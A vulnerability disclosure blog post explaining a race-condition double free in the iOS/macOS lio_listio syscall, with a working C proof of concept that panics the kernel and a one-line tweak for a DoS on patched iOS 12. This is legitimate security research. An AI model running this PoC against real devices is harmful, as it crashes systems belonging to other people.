LightSpeed, a race for an iOS/MacOS sandbox escape!


TL;DR: disclosure of an iOS 11.4.1 kernel vulnerability in lio_listio and a PoC to panic the kernel.

iOS 12 was released a few weeks ago and came with a lot of security fixes and improvements. In particular, this new version patches a cool kernel vulnerability we discovered at Synacktiv.

It is unknown whether this vulnerability was discovered internally by Apple's teams or whether it is CVE-2018-4344, reported by the UK's National Cyber Security Centre (NCSC). Since no one seems to have disclosed it yet, we are doing so in this blog post!

This vulnerability is located in the lio_listio syscall and is triggered by winning a race condition. It can effectively be used to free a kernel object twice, leading to a potential use-after-free (UaF).

The vulnerability was introduced sometime between xnu-1228 and xnu-1456, so about 9 years ago, and should be exploitable on most multi-core iOS devices up to and including iOS 11.4.1, and on MacOS until 10.14. Internally, we named this vulnerability LightSpeed, in reference to the tricky race condition to win (and as an excuse to add some Star Wars memes), but don't worry, we will not try to brand it.

Because the lio_listio syscall is reachable from any sandbox, and given the (potentially) interesting primitives offered by the vulnerability, LightSpeed might be used to jailbreak iOS 11.4.1. However, this blog post only explains the vulnerability and provides the code to trigger it and crash the kernel (sorry jb eta folks :D, the jailbreak will have to wait).

AIO syscalls introduction

As defined in POSIX.1b, the XNU kernel provides several syscalls allowing userland to perform asynchronous I/O (aio). The standard specifies various functions to implement, such as aio_read(), aio_write(), lio_listio(), aio_error(), aio_return(), etc. Those syscalls have been implemented in bsd/kern/kern_aio.c since at least xnu-517, and most related structures are declared in bsd/sys/aio.h.

As an introduction to the aio function family, aio_read() and aio_write() are respectively the asynchronous versions of the read() and write() syscalls. Both functions expect a struct aiocb* describing the I/O to perform:

```c
struct aiocb {
    int             aio_fildes;     /* File descriptor */
    off_t           aio_offset;     /* File offset */
    volatile void  *aio_buf;        /* Location of buffer */
    size_t          aio_nbytes;     /* Length of transfer */
    int             aio_reqprio;    /* Request priority offset */
    struct sigevent aio_sigevent;   /* Signal number and value */
    int             aio_lio_opcode; /* Operation to be performed */
};
```

To schedule an I/O request, XNU first translates the user structure into an aio_workq_entry with the function aio_create_queue_entry(). The kernel then enqueues the created object into the system-wide aio queues with aio_enqueue_work().

Here are the prototypes of both functions:

```c
static aio_workq_entry *
aio_create_queue_entry(proc_t procp, user_addr_t aiocbp,
                       void *group_tag, int kindOfIO);

static void
aio_enqueue_work( proc_t procp, aio_workq_entry *entryp, int proc_locked);
```

After the enqueuing, the scheduled jobs are ready to be fetched and handled by the aio workers, which are kernel threads executing the function aio_work_thread().

Both aio_read() and aio_write() are expected to return immediately; the status of the aio can later be queried with aio_error(), and its result retrieved with aio_return().
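As an illustration of this flow from userland, here is a minimal sketch (not taken from the PoC) that fills a struct aiocb, submits it with aio_read(), waits with aio_suspend() while aio_error() reports EINPROGRESS, and finally consumes the result with aio_return(). The helper name async_read_once() is hypothetical; the calls themselves are the standard POSIX aio API.

```c
#define _POSIX_C_SOURCE 200809L
#include <aio.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: reads up to len bytes at offset 0 of fd asynchronously,
 * waits for the request to finish and returns what aio_return() reports
 * (number of bytes read, or -1 on error). */
ssize_t async_read_once(int fd, char *buf, size_t len)
{
    struct aiocb cb;
    memset(&cb, 0, sizeof(cb));                 /* unused fields must be zero */
    cb.aio_fildes = fd;
    cb.aio_offset = 0;
    cb.aio_buf = buf;
    cb.aio_nbytes = len;
    cb.aio_sigevent.sigev_notify = SIGEV_NONE;  /* no completion signal */

    if (aio_read(&cb) != 0)                     /* returns once the request is queued */
        return -1;

    /* Sleep until the request is no longer in progress. */
    const struct aiocb *list[1] = { &cb };
    while (aio_error(&cb) == EINPROGRESS)
        aio_suspend(list, 1, NULL);

    /* aio_return() must be called once to consume the result. */
    return aio_return(&cb);
}
```

On older glibc versions the aio functions need `-lrt` at link time; on macOS they are part of libSystem.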

lio_listio

After this introduction, let's talk about lio_listio(). This syscall is similar to aio_read() and aio_write() but is designed to schedule a whole list of aio in a single call. It therefore takes an array of pointers to struct aiocb, along with a few other arguments:

```c
int lio_listio(int mode, struct aiocb *restrict const list[restrict],
               int nent, struct sigevent *restrict sig);
```

The mode argument specifies the behaviour of the syscall and must be one of:

- LIO_NOWAIT: the aio are scheduled then the syscall returns immediately;

- LIO_WAIT: the aio are scheduled, then the syscall blocks until all of them have completed (the I/O themselves are still performed asynchronously by the aio workers).
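The following sketch shows a batch from userland: a single lio_listio() call in LIO_WAIT mode schedules several one-byte reads, interleaved with LIO_NOP entries that are not scheduled at all. The helper batch_read() and the BATCH constant are hypothetical; only lio_listio(), aio_error() and aio_return() are the real API.

```c
#define _POSIX_C_SOURCE 200809L
#include <aio.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>

#define BATCH 4

/* Hypothetical helper: submits BATCH one-byte reads of fd in one
 * lio_listio(LIO_WAIT) call. Odd entries use LIO_NOP, so only the even ones
 * perform I/O. Returns the total number of bytes read, or -1 on error. */
long batch_read(int fd, char out[BATCH])
{
    struct aiocb cbs[BATCH];
    struct aiocb *list[BATCH];

    memset(cbs, 0, sizeof(cbs));
    for (int i = 0; i < BATCH; i++) {
        cbs[i].aio_fildes = fd;
        cbs[i].aio_offset = i;
        cbs[i].aio_buf = &out[i];
        cbs[i].aio_nbytes = 1;
        cbs[i].aio_lio_opcode = (i % 2 == 0) ? LIO_READ : LIO_NOP;
        cbs[i].aio_sigevent.sigev_notify = SIGEV_NONE;
        list[i] = &cbs[i];
    }

    /* LIO_WAIT: the call only returns once every scheduled request is done. */
    if (lio_listio(LIO_WAIT, list, BATCH, NULL) != 0)
        return -1;

    long total = 0;
    for (int i = 0; i < BATCH; i += 2) {   /* only real requests have a result */
        if (aio_error(&cbs[i]) != 0)
            return -1;
        total += aio_return(&cbs[i]);
    }
    return total;
}
```

With LIO_NOWAIT instead, the call would return right away and the caller would have to poll each entry with aio_error(), which is exactly what the PoC further down does.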

In the LIO_WAIT case, the kernel has to keep track of the whole batch of aio. Indeed, when the last I/O of a batch is processed, the aio worker thread wants to wake up the user's thread, which is still waiting in the syscall.

So the kernel allocates a struct aio_lio_context to track the batch of I/O (this is done in both modes):

```c
struct aio_lio_context
{
    int io_waiter;
    int io_issued;
    int io_completed;
};
typedef struct aio_lio_context aio_lio_context;
```
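To make the memory layout explicit, the snippet below mirrors this structure in userland and checks two facts the Crash section relies on, assuming a 32-bit int as on the arm64 and x86_64 Apple platforms: the structure is 12 bytes long (hence the kalloc.16 pool mentioned later), and io_issued is its second dword, at offset 4. The io_issued_offset() helper is only there for illustration, and the io_waiter comment is inferred from how do_aio_completion() uses the field.

```c
#include <stddef.h>

/* Userland copy of the kernel's struct aio_lio_context. */
struct aio_lio_context {
    int io_waiter;     /* dword 0: non-zero when a thread waits (LIO_WAIT) */
    int io_issued;     /* dword 1: number of I/O requests scheduled */
    int io_completed;  /* dword 2: number of I/O requests already handled */
};

/* Byte offset of io_issued, i.e. the "second dword" of the allocation. */
size_t io_issued_offset(void)
{
    return offsetof(struct aio_lio_context, io_issued);
}
```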

Here are the relevant parts of the lio_listio implementation (most of the code has been stripped out):

```c
int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    /* lio_context allocation */
    MALLOC(lio_context, aio_lio_context*, sizeof(aio_lio_context), M_TEMP, M_WAITOK);

    /* userland extraction */
    aiocbpp = aio_copy_in_list(p, uap->aiocblist, uap->nent);

    lio_context->io_issued = uap->nent;

    for ( i = 0; i < uap->nent; i++ ) {
        user_addr_t my_aiocbp;
        aio_workq_entry *entryp;

        *(entryp_listp + i) = NULL;
        my_aiocbp = *(aiocbpp + i);

        /* creation of the aio_workq_entry */
        /* lio_create_entry is a wrapper for aio_create_queue_entry */
        result = lio_create_entry(p, my_aiocbp, lio_context, (entryp_listp+i));
        if ( result != 0 && call_result == -1 )
            call_result = result;

        entryp = *(entryp_listp + i);

        aio_proc_lock_spin(p);
        // [...]

        /* enqueuing of the aio_workq_entry */
        lck_mtx_convert_spin(aio_proc_mutex(p));
        aio_enqueue_work(p, entryp, 1);
        aio_proc_unlock(p);
    }

    // [...]
}
```

Here, we see that the lio_context is attached to each aio_workq_entry (passed as the group_tag argument of aio_create_queue_entry()). Later, the aio worker threads retrieve this context, increment lio_context->io_completed and wake up the user's thread if needed.
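A minimal userland model of this LIO_WAIT handshake is sketched below, assuming a pthread mutex and condition variable stand in for the proc aio mutex and for msleep()/wakeup() on the lio_context address. The struct lio_model and the functions worker_complete_one() and run_lio_wait() are hypothetical names for illustration, not XNU code: each "worker" thread completes one request, and the waiter sleeps until io_completed reaches io_issued.

```c
#define _POSIX_C_SOURCE 200809L
#include <pthread.h>

#define MAX_WORKERS 64

/* Hypothetical model of a batch shared by the waiter and the workers. */
struct lio_model {
    pthread_mutex_t lock;   /* stands in for aio_proc_mutex(p) */
    pthread_cond_t  done;   /* stands in for msleep()/wakeup(lio_context) */
    int io_issued;
    int io_completed;
};

/* What an aio worker does after finishing one request of the batch. */
static void *worker_complete_one(void *arg)
{
    struct lio_model *ctx = arg;
    pthread_mutex_lock(&ctx->lock);
    ctx->io_completed++;
    if (ctx->io_completed == ctx->io_issued)
        pthread_cond_broadcast(&ctx->done);   /* like wakeup(lio_context) */
    pthread_mutex_unlock(&ctx->lock);
    return NULL;
}

/* Starts nent workers and waits like lio_listio() in LIO_WAIT mode.
 * Returns the final io_completed value, or -1 on error. */
int run_lio_wait(int nent)
{
    struct lio_model ctx = { PTHREAD_MUTEX_INITIALIZER, PTHREAD_COND_INITIALIZER, nent, 0 };
    pthread_t workers[MAX_WORKERS];
    int started;

    if (nent < 0 || nent > MAX_WORKERS)
        return -1;
    for (started = 0; started < nent; started++)
        if (pthread_create(&workers[started], NULL, worker_complete_one, &ctx) != 0)
            break;
    if (started < nent) {                     /* could not start every worker */
        for (int i = 0; i < started; i++)
            pthread_join(workers[i], NULL);
        return -1;
    }

    pthread_mutex_lock(&ctx.lock);
    while (ctx.io_completed < ctx.io_issued)  /* like the msleep() loop */
        pthread_cond_wait(&ctx.done, &ctx.lock);
    int completed = ctx.io_completed;
    pthread_mutex_unlock(&ctx.lock);

    for (int i = 0; i < nent; i++)
        pthread_join(workers[i], NULL);
    return completed;
}
```

In this model the waiter owns ctx and outlives every worker, so nothing can go wrong; the interesting case is the one where nobody waits, discussed next.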

The vulnerability: LightSpeed!

We explained the usage of the aio_lio_context in the previous section, but one question remains: who is responsible for freeing the context? Well, it depends on the mode of operation.

When lio_listio is called in LIO_NOWAIT mode, the thread inside the syscall does not wait for the I/O to complete, so freeing the lio_context is the aio worker's job. This is done in the routine do_aio_completion, after the last aio of the batch has been handled:

```c
static void do_aio_completion( aio_workq_entry *entryp )
{
    // [...]

    lio_context = (aio_lio_context *)entryp->group_tag;

    if (lio_context != NULL) {
        aio_proc_lock_spin(entryp->procp);
        lio_context->io_completed++;

        if (lio_context->io_issued == lio_context->io_completed) {
            lastLioCompleted = TRUE;
        }

        waiter = lio_context->io_waiter;

        /* explicit wakeup of lio_listio() waiting in LIO_WAIT */
        if ((entryp->flags & AIO_LIO_NOTIFY) && (lastLioCompleted) && (waiter != 0)) {
            /* wake up the waiter */
            wakeup(lio_context);
        }

        aio_proc_unlock(entryp->procp);
    }

    // [...]

    if (lastLioCompleted && (waiter == 0))
        free_lio_context (lio_context);

} /* do_aio_completion */
```
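The free decision above can be isolated in a few lines. This is a simplified model with locking and the wakeup path left out, using a hypothetical struct lio_ctx and helper worker_completion_frees(): each completion bumps io_completed, and only the completion of the last request of a batch without a waiter returns true.

```c
#include <stdbool.h>

/* Same three counters as the kernel's aio_lio_context. */
struct lio_ctx {
    int io_waiter;
    int io_issued;
    int io_completed;
};

/* Mirrors the bookkeeping of do_aio_completion() for one finished request.
 * Returns true when the worker must free the context. */
bool worker_completion_frees(struct lio_ctx *ctx)
{
    ctx->io_completed++;
    bool last = (ctx->io_issued == ctx->io_completed);
    return last && ctx->io_waiter == 0;
}
```

In LIO_NOWAIT mode, the worker handling the last request therefore frees the context on its own, regardless of where the issuing thread currently is in lio_listio().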

On the other hand, when the caller waits in LIO_WAIT mode, the lio_context is freed by lio_listio itself. Here are the relevant parts, at the end of the syscall:

```c
int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    // [...]

    switch(uap->mode) {
    case LIO_WAIT:
        aio_proc_lock_spin(p);
        while (lio_context->io_completed < lio_context->io_issued) {
            result = msleep(lio_context, aio_proc_mutex(p), /*...*/);
            // [...]
        }

        /* If all IOs have finished must free it */
        if (lio_context->io_completed == lio_context->io_issued) {
            free_context = TRUE;
        }

        aio_proc_unlock(p);
        break;

    case LIO_NOWAIT:
        break;
    }

    // [...]

ExitRoutine:
    if ( entryp_listp != NULL )
        FREE( entryp_listp, M_TEMP );

    if ( aiocbpp != NULL )
        FREE( aiocbpp, M_TEMP );

    if ((lio_context != NULL) &&
        ((lio_context->io_issued == 0) || (free_context == TRUE))) {
        free_lio_context(lio_context);
    }

    // [...]

    return( call_result );
} /* lio_listio */
```

The previous code contains a subtle vulnerability that can be triggered in LIO_NOWAIT mode. The final test on (lio_context->io_issued == 0) is an error-handling case meant to free the context when no I/O was scheduled. This can for instance happen when the user requests a batch of I/O in which every entry has LIO_NOP as its aio_lio_opcode (instead of LIO_READ or LIO_WRITE).

However, at this point of the execution, this check is unsafe: in LIO_NOWAIT mode nothing guarantees that lio_context is still valid, since the aio worker threads may already have completed the I/O and freed it.

And here comes the race!

If we have super fast aio workers that handle all our I/O before the syscall is over, lio_context may already have been freed and even reused! Indeed, once the aio are enqueued, a worker only needs the caller's proc p_mlock to start working, and lio_listio releases that lock on multiple occasions.

So if lio_context was freed and reused, lio_context->io_issued might read as zero. In this case, lio_listio ends up calling free_lio_context() a second time, which actually frees whatever kernel allocation now occupies that memory.

Crash

To sum up, we need the following sequence of events to happen in order to trigger the vulnerability:

1. a call to lio_listio() to allocate an aio_lio_context and schedule some aio, then a context switch before the end of the syscall;
2. the handling of all the scheduled I/O by the aio worker threads, and the freeing of the aio_lio_context;
3. an allocation in the kalloc.16 pool (the size of aio_lio_context) that reuses the memory of the aio_lio_context;
4. a zero write on the second dword of the allocation (so that lio_context->io_issued == 0);
5. a context switch to resume the suspended lio_listio() call and trigger the free of the allocation.

Steps 3 and 4 are mandatory. Indeed, because of the size of the allocation (kalloc.16), the freed chunk always ends up being poisoned (in zfree()), so lio_context->io_issued cannot be zero in step 5 unless the allocation was reused. After step 5, if the allocation has not been reallocated in the meantime and the kernel tries to free it again, the system panics.
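The five steps, and the role of poisoning, can be replayed deterministically in userland. The sketch below is a toy model, not kernel code and not the PoC: the 16-byte zone with last-freed-first reuse, the 0xdeadbeef poison value and all function names (zone_init(), zalloc16(), zfree16(), replay_lightspeed()) are assumptions made for illustration, and a counter replaces the kernel panic. Without steps 3 and 4, the stale io_issued reads as poison and the second free never happens; with them, the context's slot is freed on behalf of its new owner, whose own free then becomes a double free.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define SLOTS  4
#define POISON 0xdeadbeefu   /* assumed poison pattern for freed slots */

/* Toy kalloc.16 zone: 16-byte slots, the last freed slot is reused first. */
struct zone {
    uint32_t mem[SLOTS][4];
    bool     in_use[SLOTS];
    int      free_stack[SLOTS];
    int      nfree;
    int      double_frees;   /* the real kernel would panic instead */
};

static void zone_init(struct zone *z)
{
    memset(z, 0, sizeof(*z));
    for (int i = SLOTS - 1; i >= 0; i--)
        z->free_stack[z->nfree++] = i;
}

static int zalloc16(struct zone *z)
{
    if (z->nfree == 0)
        return -1;
    int slot = z->free_stack[--z->nfree];
    z->in_use[slot] = true;
    return slot;
}

static void zfree16(struct zone *z, int slot)
{
    if (!z->in_use[slot]) {          /* freeing an already free slot */
        z->double_frees++;
        return;
    }
    z->in_use[slot] = false;
    for (int i = 0; i < 4; i++)
        z->mem[slot][i] = POISON;    /* poisoning on free, as in zfree() */
    z->free_stack[z->nfree++] = slot;
}

/* Replays one LIO_NOWAIT call with a single I/O. Returns the number of
 * double frees observed, or -1 if the toy zone runs out of slots. */
int replay_lightspeed(bool reuse_with_zero)
{
    struct zone z;
    zone_init(&z);

    /* Step 1: lio_listio() allocates the context and schedules 1 I/O. */
    int lio = zalloc16(&z);
    if (lio < 0)
        return -1;
    uint32_t *ctx = z.mem[lio];      /* pointer kept by lio_listio() */
    ctx[0] = 0;                      /* io_waiter: nobody waits (NOWAIT) */
    ctx[1] = 1;                      /* io_issued */
    ctx[2] = 0;                      /* io_completed */

    /* Step 2: a worker completes the only I/O and frees the context. */
    ctx[2]++;
    if (ctx[1] == ctx[2] && ctx[0] == 0)
        zfree16(&z, lio);

    /* Steps 3-4: another kalloc.16 user grabs the slot, dword 1 == 0. */
    int other = -1;
    if (reuse_with_zero) {
        other = zalloc16(&z);
        if (other < 0)
            return -1;
        z.mem[other][1] = 0;
    }

    /* Step 5: lio_listio() resumes and runs its vulnerable epilogue test. */
    if (ctx[1] == 0)                 /* lio_context->io_issued == 0 */
        zfree16(&z, lio);            /* frees the new owner's allocation */

    /* The new owner eventually frees its allocation as well. */
    if (other >= 0)
        zfree16(&z, other);

    return z.double_frees;
}
```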

The following code demonstrates such a panic (github link):

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <aio.h>
#include <sys/errno.h>
#include <sys/stat.h>
#include <pthread.h>
#include <poll.h>

/* might have to play with those a bit */
#if MACOS_BUILD
#define NB_LIO_LISTIO 1
#define NB_RACER 5
#else
#define NB_LIO_LISTIO 1
#define NB_RACER 30
#endif

#define NENT 1

void *anakin(void *a)
{
    printf("Now THIS is podracing!\n");

    uint64_t err;
    int mode = LIO_NOWAIT;
    int nent = NENT;
    char buf[NENT];
    void *sigp = NULL;
    struct aiocb **aio_list = NULL;
    struct aiocb *aios = NULL;
    char path[1024] = {0};

#if MACOS_BUILD
    snprintf(path, sizeof(path), "/tmp/lightspeed");
#else
    snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));
#endif

    int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
    if (fd < 0)
    {
        perror("open");
        goto exit;
    }

    /* prepare real aio */
    aio_list = malloc(nent * sizeof(*aio_list));
    if (aio_list == NULL)
    {
        perror("malloc");
        goto exit;
    }

    aios = malloc(nent * sizeof(*aios));
    if (aios == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(aios, 0, nent * sizeof(*aios));
    for (uint32_t i = 0; i < nent; i++)
    {
        struct aiocb *aio = &aios[i];
        aio->aio_fildes = fd;
        aio->aio_offset = 0;
        aio->aio_buf = &buf[i];
        aio->aio_nbytes = 1;
        aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D
        aio->aio_sigevent.sigev_notify = SIGEV_NONE;
        aio_list[i] = aio;
    }

    while (1)
    {
        err = lio_listio(mode, aio_list, nent, sigp);
        for (uint32_t i = 0; i < nent; i++)
        {
            /* check the return err of the aio to fully consume it */
            while (aio_error(aio_list[i]) == EINPROGRESS) {
                usleep(100);
            }
            err = aio_return(aio_list[i]);
        }
    }

exit:
    if (fd >= 0)
        close(fd);
    if (aio_list != NULL)
        free(aio_list);
    if (aios != NULL)
        free(aios);
    return NULL;
}

void *sebulba(void *arg)
{
    (void)arg;
    printf("You're Bantha poodoo!\n");
    while (1)
    {
        /* not mandatory but used to make the race more likely */
        /* this poll() will force a kalloc16 of a struct poll_continue_args */
        /* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
        /* this technique is quite slow (1ms waiting time) and better ways to do so exist */
        int n = poll(NULL, 0, 1);
        if (n != 0)
        {
            /* when the race plays perfectly we might detect it before the crash */
            /* most of the time though, we will just panic without going here */
            printf("poll: %x - kernel crash incoming!\n", n);
        }
    }
    return NULL;
}

void crash_kernel(void)
{
    /* both pointers start NULL so the exit path can always free them */
    pthread_t *lio_listio_threads = NULL;
    pthread_t *racers_threads = NULL;

    lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));
    if (lio_listio_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    racers_threads = malloc(NB_RACER * sizeof(*racers_threads));
    if (racers_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));
    memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));

    for (uint32_t i = 0; i < NB_RACER; i++)
        pthread_create(&racers_threads[i], NULL, sebulba, NULL);

    for (uint32_t i = 0; i < NB_LIO_LISTIO; i++)
        pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);

    for (uint32_t i = 0; i < NB_RACER; i++)
        pthread_join(racers_threads[i], NULL);

    for (uint32_t i = 0; i < NB_LIO_LISTIO; i++)
        pthread_join(lio_listio_threads[i], NULL);

exit:
    free(racers_threads);
    free(lio_listio_threads);
}

#if MACOS_BUILD
int main(int argc, char* argv[])
{
    crash_kernel();
    return 0;
}
#endif
```

Fix and conclusion

While the latest available XNU sources (xnu-4570.71.2) still contain the bug, the vulnerability was patched in iOS 12 (at least since beta 4).



Here is the output of Hex-Rays Decompiler at the end of the syscall:

This is probably the result of compiling the following code:

```c
if ((free_context == TRUE) && (lio_context != NULL)) {
    free_lio_context(lio_context);
}
```

On the one hand, this patch fixes the potential UaF on the lio_context. On the other hand, the error case that was handled before the fix (no I/O scheduled at all) is now ignored. As a result, it is possible to make lio_listio() allocate an aio_lio_context that will never be freed by the kernel. Repeating this gives us a silly DoS that also crashes recent kernels (iOS 12 included).

To test it, just change LIO_READ to LIO_NOP in the PoC and set NB_RACER to 0.
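The difference between the two epilogue conditions can be summed up in a small model. This is a sketch under the assumptions stated in this post: for a batch made only of LIO_NOP entries, io_issued ends up at 0, and free_context is only set in LIO_WAIT mode once every I/O has completed. The struct epilogue_in and the helpers frees_before_fix() and frees_after_fix() are hypothetical names.

```c
#include <stdbool.h>

/* Simplified state of lio_listio() when it reaches ExitRoutine. */
struct epilogue_in {
    bool lio_wait;      /* mode == LIO_WAIT */
    int  io_issued;     /* 0 when every entry was LIO_NOP */
    int  io_completed;
};

/* free_context is only set on the LIO_WAIT path once all I/O is done. */
static bool free_context(struct epilogue_in in)
{
    return in.lio_wait && in.io_completed == in.io_issued;
}

/* Condition before the fix: also frees when nothing was scheduled. */
bool frees_before_fix(struct epilogue_in in)
{
    return in.io_issued == 0 || free_context(in);
}

/* Condition after the fix, as reconstructed from the decompiled code. */
bool frees_after_fix(struct epilogue_in in)
{
    return free_context(in);
}
```

With the fix, an all-LIO_NOP call in LIO_NOWAIT mode never frees its context, and since no I/O was scheduled, no worker ever reaches do_aio_completion() for it either: each such call leaks one aio_lio_context.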

In conclusion, we are pretty happy to disclose this vulnerability in this blog post and we hope you liked it. This vulnerability is still triggerable on iOS 11.4.1, so feel free to try to build a jailbreak from it (even though it might be easier with other disclosed vulnerabilities).

As for the rest, we will see in the future whether Apple bothers to fix the little DoS they introduced with the patch :D

I would like to thank my colleagues for their help in the making of this blogpost.